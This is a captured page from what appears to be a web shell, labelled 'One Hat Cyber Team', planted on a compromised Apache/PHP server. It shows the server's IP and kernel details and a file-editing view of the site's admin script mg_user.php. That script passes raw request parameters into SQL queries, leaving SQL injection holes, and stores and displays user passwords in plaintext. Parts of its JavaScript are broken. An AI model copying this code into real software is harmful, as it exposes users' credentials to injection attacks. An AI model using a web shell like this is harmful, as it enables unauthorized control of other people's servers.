One Hat Cyber Team
Your IP :
216.73.216.240
Server IP :
162.240.106.28
Server :
Linux server.ganesand.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
Server Software :
Apache
PHP Version :
7.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
thoa
/
public_html
/
admin
/
Edit File:
mg_user.php
<? error_reporting(0); session_start(); include 'config.php'; $_POST['username']=$_SESSION['username']; $_POST['password']=$_SESSION['password']; $sql=mysql_query("select * from admin where USERNAME='".$_POST['username']."' and PASSWORD='".$_POST['password']."'"); if(mysql_num_rows($sql)==1) { date_default_timezone_set("Asia/Kolkata"); $todate = date("Y-m-d H:i:s"); $U_ID = $_GET['U_ID']; $view = mysql_query("select * from userlogin where U_ID = '".$U_ID."'"); // for editing $data = mysql_fetch_array($view); if($_GET['SAI']){ $STS = $_GET['U_STS']; if($STS == 0){ $upd_sts = mysql_query("UPDATE userlogin SET U_STS ='0' WHERE U_ID ='".$_GET['SAI']."'"); //for changing status } else{ $upd_sts = mysql_query("UPDATE userlogin SET U_STS ='1' WHERE U_ID ='".$_GET['SAI']."'"); } } if($_GET['del_id']){ ?> <?php $del = mysql_query("delete from userlogin where U_ID='".$_GET['del_id']."'"); //for deleting status if($del){?> <script> alert("User detail deleted sucessfully"); window.location= "mg_user.php"; </script> <?php } if(!$del){?> <script> alert("User detail Not deleted sucessfully"); window.location= "mg_user.php"; </script> <?php } } if($_POST['submit']){ $uname = mysql_real_escape_string($_POST['uname']); $uphone = mysql_real_escape_string($_POST['uphone']); $uemail = mysql_real_escape_string($_POST['uemail']); $upwd = mysql_real_escape_string($_POST['upwd']); $add = mysql_real_escape_string($_POST['add']); if($_GET['U_ID']==""){ $tablecross = mysql_query("select * from userlogin where U_MAIL='$uemail'"); $rowcross=mysql_fetch_array($tablecross); if($rowcross) {?> <script>alert("User-ID already exists"); </script> <? } else { $ins = mysql_query("insert into userlogin (U_NAME,U_MOBILE,U_MAIL,U_PASS,U_CREATE,U_ADD) values('$uname','$uphone','$uemail','$upwd','$todate','$add')"); ?><script>alert("Inserted sucessfully"); </script><? } } if($_GET['U_ID']!=""){ $upd = mysql_query("update userlogin set U_NAME='$uname',U_MOBILE='$uphone',U_MAIL='$uemail',U_PASS='$upwd',U_ADD='$add' WHERE U_ID ='".$U_ID."'"); if($upd){?> <script>alert("updated sucessfully"); window.location ="mg_user.php" </script> <?php } if(!$upd){?> <script>alert("Not updated sucessfully"); window.location ="mg_user.php" </script> <?php } } } ?> <script> function del(id){ var del = confirm("Are you sure Want to delete"); if(del){ window.location.href = "mg_user.php?del_id="+id+"&del=1"; } else{ window.location.href = "mg_user.php"; } } </script> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Admin Panel</title> <link href="css/bootstrap.min.css" rel="stylesheet"> <link href="css/datepicker3.css" rel="stylesheet"> <link href="css/bootstrap-table.css" rel="stylesheet"> <link href="css/styles.css" rel="stylesheet"> <!--[if lt IE 9]> <script src="js/html5shiv.js"></script> <script src="js/respond.min.js"></script> <![endif]--> </head> <script type="text/javascript" src="js/tinymce/tinymce.min.js"></script> <script type="text/javascript"> tinymce.init({ selector: "textarea", themes: "modern", forced_root_block : 'p' plugins: [ "advlist autolink lists link image charmap print preview anchor", "searchreplace visualblocks code fullscreen", "insertdatetime media table contextmenu paste" ], toolbar: "insertfile undo redo | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image" }); </script> <script> function getstate(U_ID){ $.ajax({ type: "GET", url: "../get_state.php?U_ID="+U_ID, success: function(result){ $("#state").html(result); } }); } function getcity(sid){ alert $.ajax({ type: "GET", url: "../get_city.php?sid="+sid, success: function(result){ $("#city").html(result); } }); } </script> <body> <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#sidebar-collapse"> <a href="#"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </a> </button> <a class="navbar-brand" href="#">Admin</a> <ul class="user-menu"> <li class="dropdown pull-right"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"><span class="glyphicon glyphicon-user"></span> User <span class="caret"></span></a> <ul class="dropdown-menu" role="menu"> <li><a href="#"><span class="glyphicon glyphicon-user"></span> Profile</a></li> <li><a href="#"><span class="glyphicon glyphicon-cog"></span> Settings</a></li> <li><a href="logou.php"><span class="glyphicon glyphicon-log-out"></span> Logout</a></li> </ul> </li> </ul> </div> </div><!-- /.container-fluid --> </nav> <div id="sidebar-collapse" class="col-sm-3 col-lg-2 sidebar"> <form role="search"> <div class="form-group"> <input type="text" class="form-control" placeholder="Search"> </div> </form> <? include('header.php');?> </div><!--/.sidebar--> <div class="col-sm-9 col-sm-offset-3 col-lg-10 col-lg-offset-2 main"> <div class="row"> <ol class="breadcrumb"> <li><a href="dash.php"><span class="glyphicon glyphicon-home"></span></a></li> <li class="active">Manage Userlogin Details</li> </ol> </div><!--/.row--> <div class="row"> <div class="col-lg-12"> <h2 class="page-header">Add Userlogin Details</h2> </div> </div><!--/.row--> <section class="content"> <div class="row"> <!-- left column --> <div class="col-xs-12"> <!-- general form elements --> <div class="box box-primary"> <!-- form start --> <div class="container"> <form role="form" method="post" action="" enctype="multipart/form-data"> <div class="box-body"> <div class="form-group col-sm-11"> <label for="exampleInputEmail1">Name</label> <input type="text" class="form-control" name="uname" value="<?php echo $data['U_NAME']; ?>"> </div> <div class="form-group col-sm-11"> <label for="exampleInputEmail1">Phone Number</label> <input type="text" class="form-control" name="uphone" value="<?php echo $data['U_MOBILE']; ?>"> </div> <div class="form-group col-sm-11"> <label for="exampleInputEmail1">User-ID/Email-ID</label> <input type="text" class="form-control" name="uemail" value="<?php echo $data['U_MAIL']; ?>"> </div> <div class="form-group col-sm-11"> <label for="exampleInputEmail1">Password</label> <input type="text" name="upwd" class="form-control" value="<?php echo $data['U_PASS']; ?>"> </div> <div class="form-group col-sm-11"> <label for="pwd">Address:</label> <textarea class="form-control" rows="2" id="add" name="add"><?php echo $data['U_ADD']; ?></textarea> </div> <div class="box-footer col-sm-11"> <button type="submit" name="submit" value="submit" class="btn btn-primary">Submit</button> <button type="reset" class="btn btn-primary">Reset</button> </div> </div> </form> </div> </div> </div> </div> </section> <hr> <div class="row" style="position: absolute;width:100%;"> <div class="col-lg-12 col-sm-12"> <div class="panel panel-default"> <div class="panel-heading">Userlogin Details Table</div> <div class="panel-body"> <table data-toggle="table" data-show-refresh="true" data-show-toggle="true" data-show-columns="true" data-search="true" data-select-item-name="toolbar1" data-pagination="true" data-sort-name="name" data-sort-order="desc"> <thead> <tr> <th data-field="state" data-checkbox="true" >Item ID</th> <th data-field="id" data-sortable="true">Item ID</th> <th data-field="dat" data-sortable="true">Created Date</th> <th data-field="fname" data-sortable="true">Name</th> <th data-field="femail" data-sortable="true">User-ID/Email-ID</th> <th data-field="uname" data-sortable="true">Password</th> <th data-field="status" data-sortable="true">Status</th> <th data-field="action" data-sortable="true">Action</th> </tr> </thead> <tbody> <?php $table = mysql_query("select * from userlogin ORDER BY U_LOG DESC,U_ID DESC"); $U_ID=1; while($row=mysql_fetch_array($table)) { ?> <tr> <td></td> <td><?php echo $U_ID;?></td> <? $time1 = strtotime($row['U_CREATE']); $myFormat = date("d/m/Y g:i A", $time1); ?> <td><?php echo $myFormat;?></td> <td><?php echo $row['U_NAME'];?></td> <td><?php echo $row['U_MAIL'];?> <? if($row['U_LOG']==1) {?> <y style="color:green;"> Online</y> <?} else {?> <y style="color:red;"> Offline </y> <?}?></td> <td><?php echo $row['U_PASS'];?></td> <td><a href= "mg_user.php?U_ID=<?php echo $row['U_ID'];?>">Edit</a>/<a href="#" onclick="del(<?php echo $row['U_ID'];?>)">Delete</a></td> <td><?php if($row['U_STS']==1) {?> <a href = "mg_user.php?U_STS=0&SAI=<?php echo $row['U_ID'];?>">Active</a> <?php } else {?> <a href = "mg_user.php?U_STS=1&SAI=<?php echo $row['U_ID'];?>">InActive </a> <?php } ?></td> </tr> <?php $U_ID++; }?> </tbody> </table> </div> </div> </div> </div> </div> <!--/.main--> <script src="js/jquery-1.11.1.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/chart.min.js"></script> <script src="js/chart-data.js"></script> <script src="js/easypiechart.js"></script> <script src="js/easypiechart-data.js"></script> <script src="js/bootstrap-datepicker.js"></script> <script src="js/bootstrap-table.js"></script> <script> $(document).ready(function() { $('ul.subcat').hide(); $('li').click(function(event) { event.stopPropagation(); $('> ul', this).toggle(); }); }); </script> </body> </html> <? } else { $queryu=mysql_query("select * from admin where ID='1'"); $rowu=mysql_fetch_array($queryu); if($rowu) { $rowu['A_LOG']; $log = $rowu['A_LOG'] - 1; $upd_sts = mysql_query("UPDATE admin SET A_LOG ='$log' where ID='1'"); } header("Location: home.php"); } ?>
Simpan